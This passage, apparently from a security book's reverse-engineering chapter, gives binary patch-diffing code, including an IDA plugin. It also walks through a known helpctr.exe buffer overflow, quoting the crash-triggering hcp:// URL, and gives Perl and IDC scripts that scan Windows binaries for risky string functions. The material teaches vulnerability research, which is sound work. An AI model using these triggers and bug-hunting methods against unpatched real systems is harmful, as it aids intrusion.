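    if pos < len(image):
        chunks.append((pos, image[pos:]))
    return chunks


def _digest(body: bytes) -> str:
    return hashlib.sha256(body).hexdigest()


def function_diff(old: bytes, new: bytes):
    """Match function bodies by content hash, independent of where they sit.

    Returns the bodies present in new but not in old (changed or added) and
    those present in old but not in new (changed or removed), each as
    (offset, size) within its own image. Identical bodies are matched one to
    one, so duplicated functions do not cancel each other out."""
    old_chunks = split_functions(old)
    new_chunks = split_functions(new)
    old_counts = Counter(_digest(b) for _, b in old_chunks)
    new_counts = Counter(_digest(b) for _, b in new_chunks)
    result = {"changed_in_new": [], "missing_from_new": []}
    for off, body in new_chunks:
        h = _digest(body)
        if old_counts[h] > 0:
            old_counts[h] -= 1          # matched an identical body in the old image
        else:
            result["changed_in_new"].append((off, len(body)))
    for off, body in old_chunks:
        h = _digest(body)
        if new_counts[h] > 0:
            new_counts[h] -= 1
        else:
            result["missing_from_new"].append((off, len(body)))
    return result


# Constructed stand-ins for three functions. FN_B_NEW is FN_B_OLD with a few
# extra bytes in front of its copy loop, the shape a newly added length check
# would have; the bytes are illustrative, not verified x86.
FN_A = bytes.fromhex("558bec8b45088b4d0c03c15dc3")
FN_B_OLD = bytes.fromhex("558bec8b450c8b4d08f3a45dc3")
FN_B_NEW = bytes.fromhex("558bec8b450c83f81077068b4d08f3a45dc3")
FN_C = bytes.fromhex("558bec33c05dc3")

# The patched build also uses more padding after FN_A, which is exactly the
# kind of change that floods a naive byte diff with false positives.
OLD_IMAGE = FN_A + b"\xcc" * 8 + FN_B_OLD + b"\xcc" * 8 + FN_C
NEW_IMAGE = FN_A + b"\xcc" * 12 + FN_B_NEW + b"\xcc" * 8 + FN_C

if __name__ == "__main__":
    print("naive byte diff   :", naive_diff(OLD_IMAGE, NEW_IMAGE))
    print("function-level diff:", function_diff(OLD_IMAGE, NEW_IMAGE))
```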

Our example also emphasizes the biggest problem with penetrate-and-patch security. Patches are attack maps, and clever attackers know how to read them. To use this code you will need the IDA software development kit (SDK), which is available along with the IDA product. Code is commented inline. These are standard header files. Depending on which API calls you intend to use, you may need to include other header files. Note that we have disabled a certain warning message and include the Windows header file as well. By doing this we are able to use Windows graphical user interface (GUI) code for popup dialogs and so on. The warning 4273 is thrown when you use the standard template library and it's customary to disable it.

#include <windows.h>
#pragma warning( disable:4273 )
// IDA SDK headers that declare the SDK calls used by this plugin
#include <ida.hpp>
#include <idp.hpp>
#include <bytes.hpp>
#include <loader.hpp>
#include <kernwin.hpp>
#include <lines.hpp>

Because our plugin is based on a sample plugin supplied with the SDK, the following code is merely a copy of the sample. These are required functions and the comments were already part of the sample.

//--------------------------------------------------------------------------
// This callback is called for UI notification events.
static int sample_callback(void * /*user_data*/, int event_id, va_list /*va*/)
{
  if ( event_id != ui_msg )                 // Avoid recursion.
    if ( event_id != ui_setstate
      && event_id != ui_showauto
      && event_id != ui_refreshmarked )     // Ignore uninteresting events
      msg("ui_callback %d\n", event_id);
  return 0;                                 // 0 means "process the event";
                                            // otherwise, the event would be ignored.
}

//--------------------------------------------------------------------------
// A sample of how to generate user-defined line prefixes
static const int prefix_width = 8;

static void get_user_defined_prefix(ea_t ea,
                                    int lnnum,
                                    int indent,
                                    const char *line,
                                    char *buf,
                                    size_t bufsize)
{
  buf[0] = '\0';                            // Empty prefix by default

  // We want to display the prefix only on the lines which
  // contain the instruction itself.

  if ( indent != -1 ) return;               // A directive
  if ( line[0] == '\0' ) return;            // Empty line
  if ( *line == COLOR_ON ) line += 2;
  if ( *line == ash.cmnt[0] ) return;       // Comment line...

  // We don't want the prefix to be printed again for other lines of the
  // same instruction/data. For that we remember the line number
  // and compare it before generating the prefix.

  static ea_t old_ea = BADADDR;
  static int old_lnnum;
  if ( old_ea == ea && old_lnnum == lnnum ) return;

  // Let's display the size of the current item as the user-defined prefix.
  ulong our_size = get_item_size(ea);

  // Seems to be an instruction line. We don't bother with the width
  // because it will be padded with spaces by the kernel.
  snprintf(buf, bufsize, " %lu", our_size);

  // Remember the address and line number we produced the line prefix for.
  old_ea = ea;
  old_lnnum = lnnum;
}

//--------------------------------------------------------------------------
//
//      Initialize.
//
//      IDA will call this function only once.
//      If this function returns PLUGIN_SKIP, IDA will never load it again.
//      If this function returns PLUGIN_OK, IDA will unload the plugin but
//      remember that the plugin agreed to work with the database.
//      The plugin will be loaded again if the user invokes it by
//      pressing the hot key or by selecting it from the menu.
//      After the second load, the plugin will stay in memory.
//      If this function returns PLUGIN_KEEP, IDA will keep the plugin
//      in memory. In this case the initialization function can hook
//      into the processor module and user interface notification points.
//      See the hook_to_notification_point() function.
//
//      In this example we check the input file format and make the decision.
//      You may or may not check any other conditions to decide what you do:
//      whether you agree to work with the database.
//
int init(void)
{
  if ( inf.filetype == f_ELF ) return PLUGIN_SKIP;

  // Please uncomment the following line to see how the notification works:
  // hook_to_notification_point(HT_UI, sample_callback, NULL);

  // Please uncomment the following line to see how the user-defined prefix works:
  // set_user_defined_prefix(prefix_width, get_user_defined_prefix);

  return PLUGIN_KEEP;
}

//--------------------------------------------------------------------------
//      Terminate.
//      Usually this callback is empty.
//      The plugin should unhook from the notification lists if
//      hook_to_notification_point() was used.
//
//      IDA will call this function when the user asks to exit.
//      This function won't be called in the case of emergency exits.

void term(void)
{
  unhook_from_notification_point(HT_UI, sample_callback);
  set_user_defined_prefix(0, NULL);
}

A few more header files and some global variables are included here:

// #include <...>   (header name not preserved in this copy)
#include "resource.h"

DWORD  g_tempest_state = 0;
LPVOID g_mapped_file   = NULL;
DWORD  g_file_size     = 0;

This function loads a file into memory. This file is going to be used as the target to compare our binary against. Typically you would load the unpatched file into IDA and compare it with the patched file:

    bool load_file( char *theFilename )
    {
        HANDLE aFileH = CreateFile( theFilename,
                                    GENERIC_READ,
                                    0,
                                    NULL,
                                    OPEN_EXISTING,
                                    FILE_ATTRIBUTE_NORMAL,
                                    NULL);
        if(INVALID_HANDLE_VALUE == aFileH)
        {
            msg("Failed to open file.\n");
            return FALSE;
        }

        HANDLE aMapH = CreateFileMapping( aFileH,
                                          NULL,
                                          PAGE_READONLY,
                                          0,
                                          0,
                                          NULL );
        if(!aMapH)
        {
            msg("failed to open map of file\n");
            CloseHandle(aFileH);
            return FALSE;
        }

        LPVOID aFilePointer = MapViewOfFileEx( aMapH,
                                               FILE_MAP_READ,
                                               0,
                                               0,
                                               0,
                                               NULL);
        if(!aFilePointer)
        {
            // MapViewOfFileEx returns NULL on failure; don't hand a NULL
            // view to the scanner.
            msg("failed to map view of file\n");
            CloseHandle(aMapH);
            CloseHandle(aFileH);
            return FALSE;
        }

        DWORD aFileSize = GetFileSize(aFileH, NULL);
        g_file_size = aFileSize;
        g_mapped_file = aFilePointer;

        return TRUE;
    }

This function takes a string of opcodes and scans the target file for these bytes. If the opcodes are not found in the target, the location will be marked as changed. This is obviously a simple technique, but it works in many cases. Because of the problems listed at the beginning of this section, this approach can cause problems with false positives.

    bool check_target_for_string(ea_t theAddress, DWORD theLen)
    {
        bool ret = FALSE;
        if(theLen > 4096)
        {
            msg("skipping large buffer\n");
            return TRUE;
        }
        // Nothing to compare (or no target loaded): treat as "not different".
        if(theLen == 0 || g_mapped_file == NULL)
        {
            return TRUE;
        }
        try
        {
            // Scan the target binary for the string.
            static char g_c[4096];

            // I don't know any other way to copy the data string
            // out of the IDA database?!
            for(DWORD i=0;i<theLen;i++)
            {
                g_c[i] = (char)get_byte(theAddress + i);
            }

            // A simple string compare: find each candidate occurrence of the
            // first byte in the mapped target and compare the whole sequence
            // at that position.
            char *tp = (char *)g_mapped_file;
            char *curr = tp;
            DWORD sz = g_file_size;      // bytes remaining from curr to end of file
            while(curr)
            {
                tp = (char *)memchr(curr, g_c[0], sz);
                if(tp)
                {
                    sz = g_file_size - (DWORD)(tp - (char *)g_mapped_file);
                    if(sz >= theLen)
                    {
                        if(0 == memcmp(tp, g_c, theLen))
                        {
                            // We found a match!
                            ret = TRUE;
                            break;
                        }
                        if(sz > 1)
                        {
                            curr = ((char *)tp)+1;
                            sz--;
                        }
                        else
                        {
                            break;
                        }
                    }
                    else
                    {
                        break;
                    }
                }
                else
                {
                    break;
                }
            }
        }
        catch(...)
        {
            msg("[!] critical failure.");
            return TRUE;
        }
        return ret;
    }

This thread finds all the functions and compares them with a target binary:

    void __cdecl _test(void *p)
    {
        // Wait for start signal.
        while(g_tempest_state == 0)
        {
            Sleep(10);
        }

We call get_func_qty() to determine the number of functions in the loaded binary:

        /////////////////////////////////////
        // Enumerate through all functions.
        /////////////////////////////////////
        int total_functions = get_func_qty();
        int total_diff_matches = 0;

We now loop through each function. We call getn_func() to get the function structure for each function. The function structure is of type func_t. The ea_t type is known as "effective address" and is actually just an unsigned long. We get the start address of the function and the end address of the function from the function structure. We then compare the sequence of bytes with the target binary:

        for(int n=0;n<total_functions;n++)
        {
            func_t *f = getn_func(n);
            ea_t myea = f->startEA;
            ea_t last_location = myea;

            while((myea <= f->endEA) && (myea != BADADDR))
            {
                // If the user has requested a stop we should return here.
                if(0 == g_tempest_state) return;

                ea_t nextea = get_first_cref_from(myea);
                ea_t amloc  = get_first_cref_to(nextea);
                ea_t amloc2 = get_next_cref_to(nextea, amloc);

                // The cref will be the previous instruction, but we
                // also check for multiple references.
                if((amloc == myea) && (amloc2 == BADADDR))
                {
                    // I was getting stuck in loops, so I added this hack
                    // to force an exit to the next function.
                    if(nextea > myea)
                    {
                        myea = nextea;

                        // ---------------------------------------------
                        // Uncomment the next two lines to get "cool"
                        // scanning effect in the GUI. Looks sweet but slows
                        // down the scan.
                        // ---------------------------------------------
                        // jumpto(myea);
                        // refresh_idaview();
                    }
                    else myea = BADADDR;
                }
                else
                {
                    // I am at a location. Reference is not last instruction _OR_
                    // I have multiple references.

                    // Diff from the previous location to here and make a comment
                    // if we don't match
                    // msg("diffing location... \n");

We place a comment in our dead listing (using add_long_cmt) if the target doesn't contain our opcode string:

                    bool pause_for_effect = FALSE;
                    int size = myea - last_location;
                    if(FALSE == check_target_for_string(last_location, size))
                    {
                        add_long_cmt(last_location, TRUE,
                            "===================================================\n" \
                            "= ** This code location differs from the target ** =\n" \
                            "====================================================\n");
                        msg("Found location 0x%08X that didn't match target!\n", last_location);
                        total_diff_matches++;
                    }

                    // The next range to diff starts where this one ended;
                    // without this every range would be compared from the
                    // start of the function.
                    last_location = myea;

                    if(nextea > myea)
                    {
                        myea = nextea;
                    }
                    else myea = BADADDR;

                    // goto next address.
                    jumpto(myea);
                    refresh_idaview();
                }
            }
        }
        msg("Finished! Found %d locations that diff from the target.\n", total_diff_matches);
    }
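The two routines above (check_target_for_string and the _test scan thread) split each function into ranges at code cross-references and then look for each range's raw bytes anywhere in the target image. The following stand-alone C program is an added example written for this page, not code from the book or from the plugin. It models that comparison on constructed x86 bytes and shows the false positive the text warns about: a call whose rel32 displacement changes only because the patched binary's layout shifted is reported as a changed location although no code changed. A second pass wildcards the displacement bytes and the spurious hit disappears. The chunk boundaries, the byte values and the rel32_at field are all assumptions of the example; inside IDA the operand positions would come from the decoded instruction rather than a hand-written table.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* One range of the original function, as the plugin's cref splitting
 * would produce it.  rel32_at is the offset (within the chunk) of a
 * call's 4-byte relative displacement, or -1 if the chunk has none.
 * These positions are an assumption of the example. */
struct chunk {
    size_t start;
    size_t len;
    int    rel32_at;
};

/* Does hay contain pat?  Pattern bytes whose mask entry is 0 match anything,
 * so the same routine does exact matching (all-ones mask) and wildcarding. */
static int contains_masked(const unsigned char *hay, size_t hay_len,
                           const unsigned char *pat, const unsigned char *mask,
                           size_t pat_len)
{
    if (pat_len == 0 || pat_len > hay_len) return 0;
    for (size_t off = 0; off + pat_len <= hay_len; off++) {
        size_t i;
        for (i = 0; i < pat_len; i++) {
            if (mask[i] && hay[off + i] != pat[i]) break;
        }
        if (i == pat_len) return 1;
    }
    return 0;
}

/* Count the chunks of orig that are not found anywhere in target.  With
 * wildcard_rel32 set, the four displacement bytes after a call are ignored. */
static int count_differing(const unsigned char *orig, const struct chunk *chunks,
                           size_t n, const unsigned char *target, size_t target_len,
                           int wildcard_rel32)
{
    int differing = 0;
    for (size_t c = 0; c < n; c++) {
        unsigned char mask[64];
        if (chunks[c].len > sizeof mask) continue;   /* skip big buffers, as the plugin does */
        memset(mask, 1, chunks[c].len);
        if (wildcard_rel32 && chunks[c].rel32_at >= 0)
            memset(mask + chunks[c].rel32_at, 0, 4);
        if (!contains_masked(target, target_len, orig + chunks[c].start, mask, chunks[c].len)) {
            printf("chunk at +0x%02zx differs from target\n", chunks[c].start);
            differing++;
        }
    }
    return differing;
}

/* Constructed x86 bytes for the demo (not taken from any real binary). */
static const unsigned char ORIG[] = {
    0x55, 0x8B, 0xEC,               /* +0x00 push ebp; mov ebp, esp */
    0x83, 0xEC, 0x20,               /* +0x03 sub esp, 0x20          */
    0xE8, 0x10, 0x00, 0x00, 0x00,   /* +0x06 call rel32 = 0x10      */
    0x33, 0xC0,                     /* +0x0B xor eax, eax           */
    0x5D, 0xC3,                     /* +0x0D pop ebp; ret           */
};

/* Target: two padding NOPs shift the layout, so the call's displacement
 * changes (0x10 -> 0x20) without the code changing; the frame size
 * (0x20 -> 0x40) is the only real modification. */
static const unsigned char TARGET[] = {
    0x90, 0x90,
    0x55, 0x8B, 0xEC,
    0x83, 0xEC, 0x40,
    0xE8, 0x20, 0x00, 0x00, 0x00,
    0x33, 0xC0,
    0x5D, 0xC3,
};

static const struct chunk CHUNKS[] = {
    { 0x00, 3, -1 }, { 0x03, 3, -1 }, { 0x06, 5, 1 }, { 0x0B, 2, -1 }, { 0x0D, 2, -1 },
};
#define NCHUNKS (sizeof CHUNKS / sizeof CHUNKS[0])

/* Exact byte search, as the plugin does it: reports 2 chunks (one false positive). */
int naive_diff_count(void)
{
    return count_differing(ORIG, CHUNKS, NCHUNKS, TARGET, sizeof TARGET, 0);
}

/* Same scan with call displacements wildcarded: reports only the real change. */
int masked_diff_count(void)
{
    return count_differing(ORIG, CHUNKS, NCHUNKS, TARGET, sizeof TARGET, 1);
}

int main(void)
{
    printf("exact byte search: %d chunk(s) reported changed\n", naive_diff_count());
    printf("rel32 wildcarded:  %d chunk(s) reported changed\n", masked_diff_count());
    return 0;
}
```

The same weakness works in the other direction: a three-byte prologue such as push ebp / mov ebp, esp appears in almost every function of the target, so a chunk that short is never reported as changed even if the function around it was rewritten. Normalising relocatable operands and refusing to trust very short ranges are the two cheapest ways to cut the noise before reaching for a proper graph-based differ.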

This function displays a dialog box prompting the user for a filename. This is a nice-looking dialog for file selection:

    char * GetFilenameDialog(HWND theParentWnd)
    {
        static TCHAR szFile[MAX_PATH] = "\0";
        strcpy( szFile, "");

        // Zero the structure so fields we don't set explicitly are defined.
        OPENFILENAME OpenFileName;
        ZeroMemory(&OpenFileName, sizeof(OpenFileName));
        OpenFileName.lStructSize       = sizeof (OPENFILENAME);
        OpenFileName.hwndOwner         = theParentWnd;
        OpenFileName.hInstance         = GetModuleHandle("diff_scanner.plw");
        OpenFileName.lpstrFilter       = "w00t! all files\0*.*\0\0";
        OpenFileName.lpstrCustomFilter = NULL;
        OpenFileName.nMaxCustFilter    = 0;
        OpenFileName.nFilterIndex      = 1;
        OpenFileName.lpstrFile         = szFile;
        OpenFileName.nMaxFile          = sizeof(szFile);
        OpenFileName.lpstrFileTitle    = NULL;
        OpenFileName.nMaxFileTitle     = 0;
        OpenFileName.lpstrInitialDir   = NULL;
        OpenFileName.lpstrTitle        = "Open";
        OpenFileName.nFileOffset       = 0;
        OpenFileName.nFileExtension    = 0;
        OpenFileName.lpstrDefExt       = "*.*";
        OpenFileName.lCustData         = 0;
        OpenFileName.lpfnHook          = NULL;
        OpenFileName.lpTemplateName    = NULL;
        OpenFileName.Flags             = OFN_EXPLORER | OFN_NOCHANGEDIR;

        if(GetOpenFileName( &OpenFileName ))
        {
            return(szFile);
        }
        return NULL;
    }

As with all "home grown" dialogs, we need to handle the Windows messages:

    BOOL CALLBACK MyDialogProc(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
    {
        switch(msg)
        {
            case WM_COMMAND:
                if (LOWORD(wParam) == IDC_BROWSE)
                {
                    char *p = GetFilenameDialog(hDlg);
                    // p is NULL when the user cancels the file dialog.
                    if(p) SetDlgItemText(hDlg, IDC_EDIT_FILENAME, p);
                }
                if (LOWORD(wParam) == IDC_START)
                {
                    char filename[255];
                    GetDlgItemText(hDlg, IDC_EDIT_FILENAME, filename, 254);
                    if(0 == strlen(filename))
                    {
                        MessageBox(hDlg, "You have not selected a target file", "Try again", MB_OK);
                    }
                    else if(load_file(filename))
                    {
                        g_tempest_state = 1;
                        EnableWindow( GetDlgItem(hDlg, IDC_START), FALSE);
                    }
                    else
                    {
                        MessageBox(hDlg, "The target file could not be opened", "Error", MB_OK);
                    }
                }
                if (LOWORD(wParam) == IDC_STOP)
                {
                    g_tempest_state = 0;
                }
                if (LOWORD(wParam) == IDOK || LOWORD(wParam) == IDCANCEL)
                {
                    if(LOWORD(wParam) == IDOK)
                    {
                    }
                    EndDialog(hDlg, LOWORD(wParam));
                    return TRUE;
                }
                break;
            default:
                break;
        }
        return FALSE;
    }

    void __cdecl _test2(void *p)
    {
        DialogBox( GetModuleHandle("diff_scanner.plw"),
                   MAKEINTRESOURCE(IDD_DIALOG1),
                   NULL,               // no owner window
                   MyDialogProc);
    }

    //--------------------------------------------------------------------------
    //
    //      The plugin method.
    //
    //      This is the main function of plugin.
    //
    //      It will be called when the user selects the plugin.
    //
    //              Arg - the input argument. It can be specified in the
    //              plugins.cfg file. The default is zero.
    //
    //

The run function is called when the user activates the plugin. In this case we start a couple of threads and post a short message to the log window:

    void run(int arg)
    {
        // Testing.
        msg("starting diff scanner plugin\n");

        _beginthread(_test, 0, NULL);
        _beginthread(_test2, 0, NULL);
    }

These global data items are used by IDA to display information about the plugin.

    //--------------------------------------------------------------------------
    char comment[] = "Diff Scanner Plugin, written by Greg Hoglund (www.rootkit.com)";

    char help[] =
            "A plugin to find binary diffs in code\n"
            "\n"
            "This module highlights code locations that have changed.\n"
            "\n";

    //--------------------------------------------------------------------------
    // This is the preferred name of the plugin module in the menu system.
    // The preferred name may be overridden in the plugins.cfg file.

    char wanted_name[] = "Diff Scanner";

    // This is the preferred hot key for the plugin module.
    // The preferred hot key may be overridden in the plugins.cfg file.
    // Note: IDA won't tell you if the hot key is not correct.
    //       It will just disable the hot key.

    char wanted_hotkey[] = "Alt-0";

    //--------------------------------------------------------------------------
    //
    //      PLUGIN DESCRIPTION BLOCK
    //
    //--------------------------------------------------------------------------
    extern "C" plugin_t PLUGIN =
    {
      IDP_INTERFACE_VERSION,
      0,                    // Plugin flags.
      init,                 // Initialize.
      term,                 // Terminate. This pointer may be NULL.
      run,                  // Invoke plugin.
      comment,              // Long comment about the plugin
                            // It could appear in the status line
                            // or as a hint.
      help,                 // Multiline help about the plugin
      wanted_name,          // The preferred short name of the plugin
      wanted_hotkey         // The preferred hot key to run the plugin
    };

Decompiling and Disassembling Software

Decompilation is the process of transforming a binary executable (that is, a compiled program) into a higher level symbolic language that is easier for humans to understand. Usually this means turning a program executable into source code in a language like C. Most systems for decompiling can't directly convert programs into 100% source code. Instead, they usually provide an "almost there" kind of intermediate representation. Many reverse compilers are actually disassemblers that provide a dump of the machine code that makes a program work.

Probably the best such tool available to the public is called IDA-Pro. IDA starts with a disassembly of program code and then analyzes program flow, variables, and function calls. IDA is hard to use and requires advanced knowledge of program behavior, but its technical level reflects the true nature of reverse engineering. IDA supplies a complete API for manipulating the program database so that users can perform custom analysis.

Other tools exist as well. A closed-source but free program called REC provides 100% C source code recovery for some kinds of binary executables. Another commercial disassembler is called WDASM. There are several decompilers for Java byte code that render Java source code (a process far less complicated than decompiling machine code for Intel chips). These systems tend to be very accurate, even when simple obfuscation techniques have been applied. There are open-source projects in this space as well, which interested readers can look up. It is always a good idea to keep several decompilers in your toolbox if you are interested in understanding programs.

Decompilers are used extensively in the computer underground to break copy protection schemes. This has given the tools an undeserved black eye. It is interesting to note that computer hacking and software piracy were largely independent in the early days of the computer underground. Hacking developed in UNIX environments, where software was free and source code was available, rendering decompiling somewhat unnecessary. Software piracy, on the other hand, was mainly developed to crack computer games, and hence was confined mainly to Apples, DOS, and Windows, for which source code was usually not available. The virus industry developed alongside the piracy movement. In the late 1990s, as more network software became available for Windows, the hacking and cracking disciplines merged and hackers learned how to break Windows software. The current focus of decompiling is shifting from cracking copy protection to auditing software for exploitable bugs. The same old tricks are being used again, but in a new environment.

Decompilation in Practice: Reversing helpctr.exe

The following example illustrates a reverse engineering session against helpctr.exe, a Microsoft program provided with the Windows XP OS. The program happens to have a security vulnerability known as a buffer overflow. This particular vulnerability was made public quite some time ago, so revealing it here does not pose a real security threat. What is important for our purposes is describing the process of revealing the fault through reverse engineering. We use IDA-Pro to disassemble the target software. The target program produces a special debug file called a Dr. Watson log. We only use IDA and the information in the debug log to locate the exact coding error that caused the problem. Note that no source code is publicly available for the target software. Figure 3-4 shows IDA in action.

Figure 3-4.

A screenshot of IDA-Pro reverse assembling the program helpctr.exe, which is included as part of the Microsoft Windows XP OS. As an exercise, we explore helpctr.exe for a buffer overflow vulnerability.

Bug Report

We learned of this vulnerability just like most people did, by reading a bug report posted to bugtraq, an industry mailing list forum where software problems and security issues are discussed. The report revealed only minor details about the problem, most notably the name of the executable and the input that caused the fault. The report revealed that the URL hcp://w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w., when supplied to Internet Explorer, caused helpctr.exe to launch. The URL does this by causing an application exception (which can be tickled remotely through a Web browser).


We recreate the fault by using the URL as input in a Windows XP environment. A debug log is created by the OS, and we then copy the debug log and the helpctr.exe binary to a separate machine for analysis. Note that we used an older Windows NT machine to perform the analysis of this bug. The original XP environment is no longer required once we induce the error and gather the data we need.

The Debug Log

A debug dump is created when the program crashes. A stack trace is included in this log, giving a hint regarding the location of the faulty code:

    0006f8ac 0100b4ab 0006f8d8 00120000 00000103 msvcrt!wcsncat+0x1e
    0006fae4 0050004f 00279b64 00279b44 00120000 HelpCtr+0xb4ab
    0054004b 00000000 00000000 00000000 00000000 0x50004f

The culprit appears to be a string concatenation function called wcsncat. The stack dump clearly shows our (fairly straightforward) URL string. We can see that the URL string dominates the stack space and thereby overflows other values:

    *----> Raw Stack Dump

    ... files.txt

This creates a large output file of all the executable files under the WINNT directory. The Perl script calls dumpbin on each file and will analyze the results to determine whether wcsncat is being used:

    open(FILENAMES, "files.txt");
    while (<FILENAMES>)
    {
        chop($_);
        my $filename = $_;
        $command = "dumpbin /imports $_ > dumpfile.txt";
        #print "trying $command";
        system($command);
        open(DUMPFILE, "dumpfile.txt");
        while (<DUMPFILE>)
        {
            if(m/wcsncat/gi)
            {
                print "$filename: $_";
            }
        }
        close(DUMPFILE);
    }
    close(FILENAMES);

Running this script on the system in the lab produces the following output:

    C:\temp>perl scan.pl
    c:\winnt\winrep.exe:                 7802833F  2E4 wcsncat
    c:\winnt\INF\UNREGMP2.EXE:           78028EDD  2E4 wcsncat
    c:\winnt\SPEECH\VCMD.EXE:            78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\dfrgfat.exe:       77F8F2A0  499 wcsncat
    c:\winnt\SYSTEM32\dfrgntfs.exe:      77F8F2A0  499 wcsncat
    c:\winnt\SYSTEM32\IESHWIZ.EXE:       78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\NET1.EXE:          77F8E8A2  491 wcsncat
    c:\winnt\SYSTEM32\NTBACKUP.EXE:      77F8F2A0  499 wcsncat
    c:\winnt\SYSTEM32\WINLOGON.EXE:                2E4 wcsncat

We can see that several of the programs under Windows NT are using wcsncat. With a little time, we could audit these files to determine whether they suffer from problems similar to the example program earlier. We could also examine DLLs using this method and generate a much larger list:

    C:\temp>dir /B /S c:\winnt\*.dll > files.txt
    C:\temp>perl scan.pl
    c:\winnt\SYSTEM32\AAAAMON.DLL:           78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\adsldpc.dll:           7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\avtapi.dll:            7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\AVWAV.DLL:             78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\BR549.DLL:             78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\CMPROPS.DLL:           78028EDD  2E7 wcsncat
    c:\winnt\SYSTEM32\DFRGUI.DLL:            78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\dhcpmon.dll:           7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\dmloader.dll:                    2FB wcsncat
    c:\winnt\SYSTEM32\EVENTLOG.DLL:          78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\GDI32.DLL:             77F8F2A0  499 wcsncat
    c:\winnt\SYSTEM32\IASSAM.DLL:            78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\IFMON.DLL:             78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\LOCALSPL.DLL:          7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\LSASRV.DLL:                      2E4 wcsncat
    c:\winnt\SYSTEM32\mpr.dll:               77F8F2A0  499 wcsncat
    c:\winnt\SYSTEM32\MSGINA.DLL:            7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\msjetoledb40.dll:      7802833F  2E2 wcsncat
    c:\winnt\SYSTEM32\MYCOMPUT.DLL:          78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\netcfgx.dll:           7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\ntdsa.dll:             7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\ntdsapi.dll:           7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\ntdsetup.dll:          7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\ntmssvc.dll:           7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\NWWKS.DLL:             7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\ODBC32.dll:            7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\odbccp32.dll:          7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\odbcjt32.dll:          7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\OIPRT400.DLL:          78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\PRINTUI.DLL:           7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\rastls.dll:            7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\rend.dll:              7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\RESUTILS.DLL:          7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\SAMSRV.DLL:            7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\scecli.dll:            7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\scesrv.dll:            7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\sqlsrv32.dll:                    2E2 wcsncat
    c:\winnt\SYSTEM32\STI_CI.DLL:            78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\USER32.DLL:            77F8F2A0  499 wcsncat
    c:\winnt\SYSTEM32\WIN32SPL.DLL:          7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\WINSMON.DLL:           78028EDD  2E4 wcsncat
    c:\winnt\SYSTEM32\dllcache\dmloader.dll:           2FB wcsncat
    c:\winnt\SYSTEM32\SETUP\msmqocm.dll:     7802833F  2E4 wcsncat
    c:\winnt\SYSTEM32\WBEM\cimwin32.dll:     7802833F  2E7 wcsncat
    c:\winnt\SYSTEM32\WBEM\WBEMCNTL.DLL:     78028EDD  2E7 wcsncat

Batch Analysis with IDA-Pro

We already illustrated how to write a plugin module for IDA. IDA also supports a scripting language; the scripts are called IDC scripts and can sometimes be easier than using a plugin. We can perform batch analysis with the IDA-Pro tool by using an IDC script as follows:

    c:\ida\idaw -Sbatch_hunt.idc -A -c c:\winnt\notepad.exe

with the very basic IDC script file shown here:

    #include <idc.idc>
    //---------------------------------------------------------------
    static main(void) {
        Batch(1);   /* will hang if existing database file */
        Wait();
        Exit(0);
    }


As another example, consider batch analysis for sprintf calls. The Perl script calls IDA using this line:

    open(FILENAMES, "files.txt");
    while (<FILENAMES>)
    {
        chop($_);
        my $filename = $_;
        $command = "dumpbin /imports $_ > dumpfile.txt";
        #print "trying $command";
        system($command);
        open(DUMPFILE, "dumpfile.txt");
        while (<DUMPFILE>)
        {
            if(m/sprintf/gi)
            {
                print "$filename: $_\n";
                system("c:\\ida\\idaw -Sbulk_audit_sprintf.idc -A -c $filename");
            }
        }
        close(DUMPFILE);
    }
    close(FILENAMES);

We use the script bulk_audit_sprintf.idc:

    //
    // This example shows how to use GetOperandValue() function.
    //
    #include <idc.idc>

    /* this routine is hard coded to understand sprintf calls */
    static hunt_address( eb,            /* the address of this call */
                         param_count,   /* the number of parameters for this call */
                         ec,            /* maximum number of instructions to backtrace */
                         output_file )
    {
        auto ep; /* placeholder */
        auto k;
        auto kill_frame_sz;
        auto comment_string;

        k = GetMnem(eb);
        if(strstr(k, "call") != 0)
        {
            Message("Invalid starting point\n");
            return;
        }

        /* backtrace code */
        while( eb=FindCode(eb, 0) )
        {
            auto j;
            j = GetMnem(eb);

            /* exit early if we run into a retn code */
            if(strstr(j, "retn") == 0) return;

            /* push means argument to sprintf call */
            if(strstr(j, "push") == 0)
            {
                auto my_reg;
                auto max_backtrace;

                ep = eb; /* save our place */

                /* work back to find out the parameter */
                my_reg = GetOpnd(eb, 0);
                fprintf(output_file, "push number %d, %s\n", param_count, my_reg);

                max_backtrace = 10; /* don't backtrace more than 10 steps */
                while(1)
                {
                    auto x;
                    auto y;

